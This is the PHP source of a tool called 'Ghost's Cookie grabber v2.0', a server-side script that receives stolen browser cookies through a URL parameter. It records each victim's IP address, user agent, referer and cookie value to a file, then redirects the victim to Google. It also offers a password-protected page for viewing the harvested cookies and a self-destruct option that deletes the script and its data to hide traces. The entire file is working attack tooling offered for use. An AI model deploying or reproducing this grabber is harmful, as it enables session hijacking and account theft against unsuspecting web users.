<?php
//Ghost's Cookie grabber v2.0
/* Begin Config Section */
//Password to access stolen cookies
$ConfigPassword = 'example123';
//File to write, chmodded 666
$CookieFile = "example.txt";
//Cookie name, use a-z A-Z 0-9 _
$ConfigCookie = 'make_this_a_complicated_string_a';
//Flag to identify you as wanting to retrieve cookies
$GetCookiesStr = "getcookies";
//Usage: http://www.sitename.tld/path/script.php?getcookies
//Flag to identify you as wanting to delete script and data file
$DeleteStr = "delete";
//Usage: http://www.sitename.tld/path/script.php?delete
//Name of variable you want to recover and store the stolen cookie
$StolenCookieStr = "str";
//Usage: http://www.sitename.tld/path/script.php?str=
//Place to send browser once cookie has been obtained
$Redirect = "http://www.google.com";
/* End Config Section */
$Self = $_SERVER['PHP_SELF'];
$GetCookies = $_GET["$GetCookiesStr"];
$Delete = $_GET["$DeleteStr"];
$StolenCookie = $_GET["$StolenCookieStr"];
/* Un-comment functions below for login features */
/*
//Remove the Symbols above (slash and asterisk) to enable login features.
//Remember to scroll down and remove the other part of the comment as well.
function LoggedIn()
{
global $ConfigCookie;
$Cookie = $_COOKIE["$ConfigCookie"];
if(isset($Cookie)) {
return true;
} else {
return false;
}
}
function LogIn()
{
global $ConfigCookie;
setcookie("$ConfigCookie");
DisplayCookies();
}
function Authenticate()
{
$Pass = $_POST['pass'];
global $ConfigPassword;
global $Self;
if($Pass == $ConfigPassword) {
LogIn();
} else {
?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Login</title>
<meta http-equiv="Content-Type" content="text/html; charset=us-ascii" />
</head>
<body>
<form action="<?php $Self; ?>" method="post">
<table border="1" cellspacing="1" cellpadding="1" rules="rows" align="center" width="50%">
<tr><th>Password</th><td align="center"><input type="password" name="pass" size="25"/></td></tr>
<tr><td align="center" colspan="2"><input type="submit" value="Login" /></td></tr>
</table>
</form>
</body>
</html>
<?php
}
}
//Remove The symbols below (slash and asterisk) to enable login features
*/
function DisplayCookies()
{
?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Cookie Details</title>
<meta http-equiv="Content-Type" content="text/html; charset=us-ascii" />
</head>
<body>
<table border="1" cellspacing="1" cellpadding="1" rules="all" align="center" width="75%">
<tr><th colspan="6">Cookie Details</th></tr>
<tr><th><small>IP Address</small></th><th><small>User Agent</small></th>
<th><small>Referer</small></th><th><small>Cookie Values</small></th></tr>
<?php
global $DeleteStr;
global $CookieFile;
$handle = fopen("$CookieFile", "a+");
$CookieFileContent = fread($handle, filesize("$CookieFile"));
$i = 0;
$CookieFileExploded = explode("\n", $CookieFileContent);
$NumCFE = count($CookieFileExploded) - 1;
while($i < $NumCFE) {
$j = $i + 1;
$k = $j + 1;
$l = $k + 1;
echo '<tr><td align="center"><small>' . "$CookieFileExploded[$i]"
. '</small></td><td align="center"><small>' . "$CookieFileExploded[$j]"
. '</small></td><td align="center"><small>' . "$CookieFileExploded[$k]"
. '</small></td><td align="center"><small>' . "$CookieFileExploded[$l]"
. '</small></td></tr>' . "\n";
$i = $i + 4;
}
?>
</table>
<center><b><a href="<?php echo $Self; ?>?<?php echo $DeleteStr; ?>"><pre><font color="#000">Delete Script and Datafile</font></pre></a></b></center>
</body>
</html>
<?php
}
function SelfDestruct()
{
global $CookieFile;
$FSSelf = __FILE__;
if(file_exists($CookieFile)) {
unlink($CookieFile);
}
unlink($FSSelf);
}
function WriteCookies()
{
global $CookieFile;
global $StolenCookie;
global $Redirect;
global $Path;
$IP = $_SERVER['REMOTE_ADDR'];
$Browser = $_SERVER['HTTP_USER_AGENT'];
$Referer = $_SERVER['HTTP_REFERER'];
if($Browser == NULL) {
$Browser = "NULL";
}
if($Referer == NULL) {
$Referer = "NULL";
}
if($StolenCookie == NULL) {
$StolenCookie = "NULL";
}
$handle = fopen("$CookieFile", "a+");
$Content = "$IP" . "\n" . "$Browser" . "\n" . "$Referer" . "\n" . "$StolenCookie" . "\n";
if(is_writeable("$CookieFile")) {
$Write = fwrite($handle, "$Content");
}
header("Location: $Redirect");
fclose($handle);
}
if(function_exists('LoggedIn') && LoggedIn()) {
if(isset($Delete)) {
SelfDestruct();
die();
}
DisplayCookies();
} elseif(isset($GetCookies)) {
if(function_exists('Authenticate')) {
Authenticate();
} else {
DisplayCookies();
}
} elseif(isset($Delete)) {
SelfDestruct();
die();
} else {
WriteCookies();
}
?>